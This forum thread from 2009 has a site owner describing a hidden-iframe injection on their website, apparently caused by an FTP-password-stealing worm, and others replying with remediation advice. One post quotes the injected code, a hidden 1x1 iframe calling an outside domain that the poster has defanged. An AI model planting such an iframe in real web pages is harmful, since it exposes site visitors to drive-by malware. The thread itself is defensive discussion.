PDA

View Full Version : we've been injected!


RainForest
05-06-2009, 11:54 PM
Hello,

Totally by accident, I discovered today that one of my sites has had some code injected onto several pages into an iframe that was placed after the closing html tag.

I've uploaded clean pages over the infected ones, and they are clean - at least for the moment...

My question is: does anyone know of any way to prevent this from happening again?

Thanks.

edbr
05-07-2009, 02:26 AM
more detail, but why is the iframe after the closing html tag?

RainForest
05-07-2009, 03:57 PM
more detail, but why is the iframe after the closing html tag?

I have no idea about why the iframe was placed where it was. I don't know anything about iframes, and this is the first time I've had to sanitize pages on a site. But I'm wondering if perhaps the code was *misplaced*, and the misplacement actually worked in our favor to keep the site safe because even though the code includes "click", there was no way to actually click on it...unless that's totally irrelevant. I found it through Firefox's NoScript add-on which alerted me about the unknown script, and that got me started researching what was going on.

Note that when I copied the source code for my evidence file, I inadvertently tried to save it as an html file instead of into a txt file (oops), and my AV program hit on it, so the code is definitely a nasty.

More detail: Here are the bottom lines of my code including the nastiness, whose link I've sanitized to "klaomta dot com": <!-- end #footer --></div>
<!-- end #container --></div>
</body>
<!-- InstanceEnd --></html>
<iframe src="http://klaomta dot com/?click=CDF2B7" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

edbr
05-08-2009, 12:23 AM
yup its malicious i trusted to my virus software.
if you are sure it wasnt put there by the site authors i would get on to my hoster as this is a security breach i would also consider changing ant ftp account passwords and check there is not a rogue one set up

RainForest
05-08-2009, 02:28 PM
if you are sure it wasnt put there by the site authors
Um, isn't that me?

i would get on to my hoster as this is a security breach i would also consider changing ant ftp account passwords and check there is not a rogue one set up
You're right on the money with this. I had contacted the host the day I discovered the infection (Wed). They called me back yesterday (Thurs). One of their "developers" (I'm not sure what they mean by using that term - aren't we all developers, as website designers/creators?) compromised the server. Again, I'm unclear on exactly what the kid I was talking to meant, but I think what happened was that somebody who was infected logged on thru FTP to upload files, and the worm was uploaded, too.

Apparently it infected only a few sites on the host, and one of those sites happened to be us. I discovered the infection occurred on 5/2 at 4:44, based on the time that the files were changed on the server. So we were infected for 4 days before I discovered the problem.

What I was told - and I believe it - is that this worm stole FTP passwords to generate web traffic. That explains the "click" in the code, as well as the "openstats.info" javascript that wanted to run, *and* the marketing malware that suddenly appeared on the laptop I use for working on the website.

What I've done is cleaned up the malware on the laptop, overwrote the dirty files with clean ones, changed my FTP password (host assures no rogue accts), and posted an alert on our site advising visitors to run a scan if they were on the site during the affected days.

I believe it's a site owner's responsibility to inform their visitors any time there's been a breach. And not to stand on a soapbox too long, but all these companies that suffer data breaches and make no effort to inform their customers really p*** me off. Everybody has the right to know if they've potentially been compromised.

So we're back to the original question - any way to prevent this? And since I discovered the infection by accident, what, should I now be checking my sites every week to make sure they're clean??? What a mess...

domedia
05-08-2009, 03:20 PM
One of their "developers" (I'm not sure what they mean by using that term - aren't we all developers, as website designers/creators?) compromised the server.\Real Estate Developer, System DEvelopers, Web Developers.. all different ;)


So we're back to the original question - any way to prevent this? And since I discovered the infection by accident, what, should I now be checking my sites every week to make sure they're clean??? What a mess... Make sure you've protected your machine properly and ask your host what they've done on their end to minimize the risk for this happening again.

RainForest
05-08-2009, 05:35 PM
Then I'm done.

Later, guys!

edbr
05-09-2009, 04:24 AM
Um, isn't that me?
how am i to know?
i would definitely change ftp passwords often, check logs for file updates rather than physically check sites.
i thing a app could be made to inform you of file update by e mail too/ but personally i would move hoster, it doesnt sound like great security or response in the circumstances

coloeagle
05-10-2009, 01:33 PM
We've had a similar discussion on another forum (yah, I'm a two-timer lol)
Thought I would share this script a member there shared. Doesn't stop your site from getting hacked but will notify you, http://www.dazzlindonna.com/blog/2009/03/23/new-tool-to-help-fight-web-site-hackers/